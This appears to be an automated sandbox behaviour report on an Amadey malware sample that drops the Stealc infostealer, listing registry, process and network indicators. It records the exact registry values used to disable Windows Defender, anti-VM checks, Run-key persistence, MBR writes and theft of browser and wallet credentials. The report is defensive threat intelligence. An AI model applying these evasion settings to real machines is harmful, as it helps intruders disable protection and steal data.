amadey | c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	TempIEGKEXBU6CBIIWDYOVL2HTXRCHILTJJL.EXE

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	TempIEGKEXBU6CBIIWDYOVL2HTXRCHILTJJL.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	TempIEGKEXBU6CBIIWDYOVL2HTXRCHILTJJL.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	TempIEGKEXBU6CBIIWDYOVL2HTXRCHILTJJL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	TempIEGKEXBU6CBIIWDYOVL2HTXRCHILTJJL.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	TempIEGKEXBU6CBIIWDYOVL2HTXRCHILTJJL.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	TempIEGKEXBU6CBIIWDYOVL2HTXRCHILTJJL.EXE

Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	TempIEGKEXBU6CBIIWDYOVL2HTXRCHILTJJL.EXE

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

defense_evasion trojan

Windows Service

Modify Registry

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications	TempIEGKEXBU6CBIIWDYOVL2HTXRCHILTJJL.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	TempIEGKEXBU6CBIIWDYOVL2HTXRCHILTJJL.EXE

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Enumerates VirtualBox registry keys 2 TTPs 1 IoCs

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF	588e9c47e5.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 19 IoCs

Query Registry

Virtualization/Sandbox Evasion

credential_access stealer

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2b1895.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ac8cfb0b0f.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	90b8a075ab.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	588e9c47e5.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Temp12V31U8EWCHA7JVIHXZU8ZGFARBUDVPT.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempIEGKEXBU6CBIIWDYOVL2HTXRCHILTJJL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	63b3bc936f.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ea982cbaed.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3H13t.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ff96711009.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1M25d5.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2b1895.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3H13t.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	588e9c47e5.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1M25d5.exe

Blocklisted process makes network request 3 IoCs

flow	pid	Process
145	5028	powershell.exe
148	4428	powershell.exe
308	7356	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1676	powershell.exe
2292	powershell.exe
1564	powershell.exe
4428	powershell.exe
7356	powershell.exe
5028	powershell.exe

Detects GOST tunneling tool 1 IoCs

A simple tunneling tool written in Golang

resource	yara_rule
behavioral1/files/0x000e000000023af2-94.dat	Gost

Downloads MZ/PE file 28 IoCs

flow	pid	Process
115	3592	3H13t.exe
115	3592	3H13t.exe
115	3592	3H13t.exe
115	3592	3H13t.exe
115	3592	3H13t.exe
115	3592	3H13t.exe
139	1428	skotes.exe
139	1428	skotes.exe
139	1428	skotes.exe
139	1428	skotes.exe
139	1428	skotes.exe
179	2936	futors.exe
179	2936	futors.exe
179	2936	futors.exe
145	5028	powershell.exe
148	4428	powershell.exe
308	7356	powershell.exe
310	2936	futors.exe
42	1428	skotes.exe
42	1428	skotes.exe
42	1428	skotes.exe
42	1428	skotes.exe
42	1428	skotes.exe
42	1428	skotes.exe
42	1428	skotes.exe
42	1428	skotes.exe
42	1428	skotes.exe
42	1428	skotes.exe

Uses browser remote debugging 2 TTPs 11 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

Steal Web Session Cookie

T1539

Modify Authentication Process

pid	Process
3724	chrome.exe
1912	chrome.exe
3824	chrome.exe
7220	chrome.exe
1604	chrome.exe
2724	chrome.exe
4532	msedge.exe
3992	msedge.exe
1656	msedge.exe
8160	chrome.exe
8180	chrome.exe

Checks BIOS information in registry 2 TTPs 38 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ea982cbaed.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1M25d5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3H13t.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	90b8a075ab.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	90b8a075ab.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	588e9c47e5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	588e9c47e5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Temp12V31U8EWCHA7JVIHXZU8ZGFARBUDVPT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ea982cbaed.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2b1895.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2b1895.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3H13t.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3H13t.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	63b3bc936f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ac8cfb0b0f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2b1895.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Temp12V31U8EWCHA7JVIHXZU8ZGFARBUDVPT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2b1895.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempIEGKEXBU6CBIIWDYOVL2HTXRCHILTJJL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	588e9c47e5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	588e9c47e5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1M25d5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1M25d5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempIEGKEXBU6CBIIWDYOVL2HTXRCHILTJJL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	63b3bc936f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ff96711009.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1M25d5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3H13t.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ff96711009.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ac8cfb0b0f.exe

Checks computer location settings 2 TTPs 9 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	built anti vm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	amnew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	1M25d5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	skotes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	Update.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	futors.exe

Executes dropped EXE 48 IoCs

pid	Process
1464	x8b75.exe
864	1M25d5.exe
1428	skotes.exe
3116	2b1895.exe
3592	3H13t.exe
1228	dzvh4HC.exe
1904	YMci4Rc.exe
4864	YMci4Rc.exe
5100	9aiiMOQ.exe
5088	9aiiMOQ.exe
1800	NL58452.exe
3264	NL58452.exe
1136	x8b75.exe
2440	1M25d5.exe
4060	2b1895.exe
3868	3H13t.exe
2260	yOO5EOR.exe
4928	built anti vm.exe
396	3aac5dd9aa.exe
1084	skotes.exe
4168	Update.exe
1260	483d2fa8a0d53818306efeb32d3.exe
4892	f3Ypd8O.exe
5076	f3Ypd8O.exe
1512	f3Ypd8O.exe
1340	TempIEGKEXBU6CBIIWDYOVL2HTXRCHILTJJL.EXE
1908	amnew.exe
2936	futors.exe
4760	588e9c47e5.exe
4736	63b3bc936f.exe
4256	ff96711009.exe
4936	ac8cfb0b0f.exe
2084	90b8a075ab.exe
5108	588e9c47e5.exe
5056	fe390939a4.exe
1804	trano1221.exe
2316	trano1221.exe
3668	83c51029eb.exe
7272	con12312211221.exe
7620	con12312211221.exe
5760	skotes.exe
6132	futors.exe
6136	Temp12V31U8EWCHA7JVIHXZU8ZGFARBUDVPT.EXE
6160	ea982cbaed.exe
6464	monthdragon.exe
6508	monthdragon.exe
6512	monthdragon.exe
8040	12321321.exe

Identifies Wine through registry keys 2 TTPs 19 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	1M25d5.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	2b1895.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	588e9c47e5.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	ff96711009.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	588e9c47e5.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	3H13t.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	3H13t.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	ac8cfb0b0f.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	Temp12V31U8EWCHA7JVIHXZU8ZGFARBUDVPT.EXE
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	1M25d5.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	TempIEGKEXBU6CBIIWDYOVL2HTXRCHILTJJL.EXE
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	ea982cbaed.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	2b1895.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	63b3bc936f.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	90b8a075ab.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	skotes.exe

Loads dropped DLL 35 IoCs

pid	Process
3592	3H13t.exe
3592	3H13t.exe
4928	built anti vm.exe
4168	Update.exe
2316	trano1221.exe
2316	trano1221.exe
2316	trano1221.exe
2316	trano1221.exe
2316	trano1221.exe
2316	trano1221.exe
2316	trano1221.exe
2316	trano1221.exe
2316	trano1221.exe
2316	trano1221.exe
2316	trano1221.exe
2316	trano1221.exe
2316	trano1221.exe
2316	trano1221.exe
2316	trano1221.exe
2316	trano1221.exe
2316	trano1221.exe
2316	trano1221.exe
2316	trano1221.exe
2316	trano1221.exe
2316	trano1221.exe
2316	trano1221.exe
2316	trano1221.exe
2316	trano1221.exe
2316	trano1221.exe
2316	trano1221.exe
2316	trano1221.exe
2316	trano1221.exe
2316	trano1221.exe
2316	trano1221.exe
2316	trano1221.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Windows security modification 2 TTPs 2 IoCs

defense_evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	TempIEGKEXBU6CBIIWDYOVL2HTXRCHILTJJL.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	TempIEGKEXBU6CBIIWDYOVL2HTXRCHILTJJL.EXE

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 11 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	x8b75.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3aac5dd9aa.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1087771101\\3aac5dd9aa.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1087772021\\am_no.cmd"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\90b8a075ab.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1088058001\\90b8a075ab.exe"	skotes.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	x8b75.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLog\\Update.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ac8cfb0b0f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1088057001\\ac8cfb0b0f.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fe390939a4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1088059001\\fe390939a4.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\83c51029eb.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1088060001\\83c51029eb.exe"	skotes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
141	raw.githubusercontent.com
142	raw.githubusercontent.com
147	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
137	ip-api.com

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	ea982cbaed.exe

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0009000000023c82-392.dat	autoit_exe
behavioral1/files/0x0007000000023cc7-717.dat	autoit_exe
behavioral1/files/0x0007000000023d4c-946.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
3868	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 19 IoCs

pid	Process
864	1M25d5.exe
1428	skotes.exe
3116	2b1895.exe
3592	3H13t.exe
2440	1M25d5.exe
4060	2b1895.exe
3868	3H13t.exe
1084	skotes.exe
1260	483d2fa8a0d53818306efeb32d3.exe
1340	TempIEGKEXBU6CBIIWDYOVL2HTXRCHILTJJL.EXE
4760	588e9c47e5.exe
4736	63b3bc936f.exe
4256	ff96711009.exe
4936	ac8cfb0b0f.exe
2084	90b8a075ab.exe
5108	588e9c47e5.exe
5760	skotes.exe
6136	Temp12V31U8EWCHA7JVIHXZU8ZGFARBUDVPT.EXE
6160	ea982cbaed.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 1904 set thread context of 4864	1904	YMci4Rc.exe	121
PID 5100 set thread context of 5088	5100	9aiiMOQ.exe	142
PID 1800 set thread context of 3264	1800	NL58452.exe	147
PID 4892 set thread context of 1512	4892	f3Ypd8O.exe	199
PID 7272 set thread context of 7620	7272	con12312211221.exe	241
PID 6464 set thread context of 6512	6464	monthdragon.exe	254

UPX packed file 19 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2316-849-0x00007FF8CED60000-0x00007FF8CF349000-memory.dmp	upx
behavioral1/memory/2316-851-0x00007FF8F3800000-0x00007FF8F380F000-memory.dmp	upx
behavioral1/memory/2316-850-0x00007FF8D68A0000-0x00007FF8D68C3000-memory.dmp	upx
behavioral1/memory/2316-852-0x00007FF8DAA40000-0x00007FF8DAA59000-memory.dmp	upx
behavioral1/memory/2316-853-0x00007FF8E9FB0000-0x00007FF8E9FBD000-memory.dmp	upx
behavioral1/memory/2316-854-0x00007FF8D4FA0000-0x00007FF8D4FB9000-memory.dmp	upx
behavioral1/memory/2316-855-0x00007FF8D4970000-0x00007FF8D499D000-memory.dmp	upx
behavioral1/memory/2316-857-0x00007FF8E9E10000-0x00007FF8E9E1D000-memory.dmp	upx
behavioral1/memory/2316-856-0x00007FF8D43B0000-0x00007FF8D43E6000-memory.dmp	upx
behavioral1/memory/2316-858-0x00007FF8CED60000-0x00007FF8CF349000-memory.dmp	upx
behavioral1/memory/2316-879-0x00007FF8CED60000-0x00007FF8CF349000-memory.dmp	upx
behavioral1/memory/2316-905-0x00007FF8D68A0000-0x00007FF8D68C3000-memory.dmp	upx
behavioral1/memory/2316-908-0x00007FF8D4FA0000-0x00007FF8D4FB9000-memory.dmp	upx
behavioral1/memory/2316-911-0x00007FF8D43B0000-0x00007FF8D43E6000-memory.dmp	upx
behavioral1/memory/2316-910-0x00007FF8E9E10000-0x00007FF8E9E1D000-memory.dmp	upx
behavioral1/memory/2316-907-0x00007FF8E9FB0000-0x00007FF8E9FBD000-memory.dmp	upx
behavioral1/memory/2316-906-0x00007FF8DAA40000-0x00007FF8DAA59000-memory.dmp	upx
behavioral1/memory/2316-909-0x00007FF8D4970000-0x00007FF8D499D000-memory.dmp	upx
behavioral1/memory/2316-904-0x00007FF8F3800000-0x00007FF8F380F000-memory.dmp	upx

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	1M25d5.exe
File created	C:\Windows\Tasks\futors.job	amnew.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000b000000023cae-725.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 6 IoCs

pid	pid_target	Process	procid_target
4704	1904	WerFault.exe	120
2616	5100	WerFault.exe	141
3800	1800	WerFault.exe	146
2360	4892	WerFault.exe	197
5284	7272	WerFault.exe	238
6520	6464	WerFault.exe	252

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	x8b75.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	con12312211221.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ea982cbaed.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9aiiMOQ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	monthdragon.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1M25d5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2b1895.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ac8cfb0b0f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	588e9c47e5.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	fe390939a4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	con12312211221.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9aiiMOQ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3aac5dd9aa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
